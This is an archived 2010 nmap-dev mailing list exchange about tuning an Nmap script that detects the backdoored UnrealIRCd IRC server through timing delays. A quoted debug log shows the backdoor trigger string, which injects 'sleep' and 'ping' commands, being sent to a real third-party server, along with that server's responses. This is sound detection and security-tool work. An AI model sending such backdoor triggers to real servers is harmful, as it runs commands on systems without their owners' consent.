Nmap Development mailing list archives
Re: Always practice safe software: a lesson from UnrealIRCd
From: Ron <ron () skullsecurity net>
Date: Thu, 24 Jun 2010 10:05:04 -0500
The attached version of the code, in my testing, had no false positives and no false negatives. The downside is, it's incredibly slow. A mutex + 10 second delay and 20 second timeout had 5 good, 1 false positive. A mutex + 25 second delay + 35 second timeout = perfect, 5 out of 5 on my test list with no false positives/negatives. So basically, 25 seconds for every infected host, 35 seconds for every host that times out, and basically no time for hosts that aren't affected either way. Something that would be useful here would be a semaphore -- let 3 or 4 go in parallel, but no more. I don't think we have that capability right now, though, and I'm not sure if that would ruin our results. Thoughts? On Wed, 23 Jun 2010 18:38:05 -0600 David Fifield <david () bamsoftware com> wrote:
On Wed, Jun 23, 2010 at 07:21:23PM -0500, Ron wrote:I found a better way to detect vulnerable servers, but unfortunately it isn't something an average person can do (requires a DNS authoritative server).From the original list, with a 20 second delay and 40 second timeout,on the list you provided earlier, I found: o 4 vulnerable servers o 3 were discovered o 1 false positive o 1 was missed because of 'too many reconnects' So, that isn't very good. We can make the delays even longer, and I think it'll get rather accurate, but I don't think that's ideal, either. I'm going to give mutex a shot, still.Ah, so the timing is accurate enough, but it's not really an accurate reflection of whether the vulnerability exists. I tried using irc-unrealircd-backdoor.command to ping a server, and against all the 9- and 11-second hosts, a vulnerability was detected but I didn't receive any pings. It looks like the delay is really being caused by a lack of an auth response. Discovered open port 6667/tcp on 91.121.137.140 NSE: Starting irc-unrealircd-backdoor against 91.121.137.140:6667. NSOCK (0.5030s) TCP connection requested to 91.121.137.140:6667 (IOD #2) EID 16 NSOCK (0.6610s) Callback: CONNECT SUCCESS for EID 16 #[91.121.137.140:6667] NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | CONNECT NSE: TCP 192.168.0.21:47629 > 91.121.137.140:6667 | AB|| SOMETHINGUNIQUE||sleep 8||ping -n 9 127.0.0.1 NSOCK (0.6700s) Write SOMETHINGUNIQUE||request for 50 bytes to IOD #2 EID 75 SOMETHINGUNIQUE||[91.121.137.140:6667]: AB||SOMETHINGUNIQUE||sleep 8|| SOMETHINGUNIQUE||ping -n 9 127.0.0.1. NSOCK (0.6700s) Callback: WRITE SUCCESS for EID 75 [91.121.137.140:6667] NSOCK (0.6900s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 106 NSOCK (0.8180s) Callback: READ SUCCESS for EID 106 [91.121.137.140:6667] (122 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Looking up your hostname... | NSOCK (0.8420s) Read request from IOD #2 [91.121.137.140:6667] | (timeout: 20000ms) EID 154 NSOCK (0.9770s) Callback: READ SUCCESS | for EID 154 [91.121.137.140:6667] (100 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** Couldn't resolve your | hostname; using your IP address instead NSOCK (0.9940s) Read | request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 178 NSOCK (12.4170s) Callback: READ SUCCESS for EID 178 [91.121.137.140:6667] (82 bytes) NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net NOTICE AUTH :*** No ident response; username prefixed with ~ NSOCK (12.4170s) Read request from IOD #2 [91.121.137.140:6667] (timeout: 20000ms) EID 274 NSOCK (12.5740s) Callback: READ SUCCESS for EID 274 [91.121.137.140:6667] (77 bytes): :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE||sleep :You have not registered.. NSE: TCP 192.168.0.21:47629 < 91.121.137.140:6667 | :Gioia.OceanIRC.net 451 AB||SOMETHINGUNIQUE|| sleep :You have not registered David Fifield _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
-- Ron Bowes http://www.skullsecurity.org http://www.twitter.com/iagox86
Attachment:
irc-unrealircd-backdoor.nse
Description:
Attachment:
_bin
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Always practice safe software: a lesson from UnrealIRCd, (continued)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 14)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 18)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 22)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 23)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 24)
- Re: Always practice safe software: a lesson from UnrealIRCd Patrick Donnelly (Jun 24)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 25)
- Re: Always practice safe software: a lesson from UnrealIRCd Ron (Jun 25)
- Re: Always practice safe software: a lesson from UnrealIRCd David Fifield (Jun 30)
- Re: Always practice safe software: a lesson from UnrealIRCd Vlatko Kosturjak (Jun 13)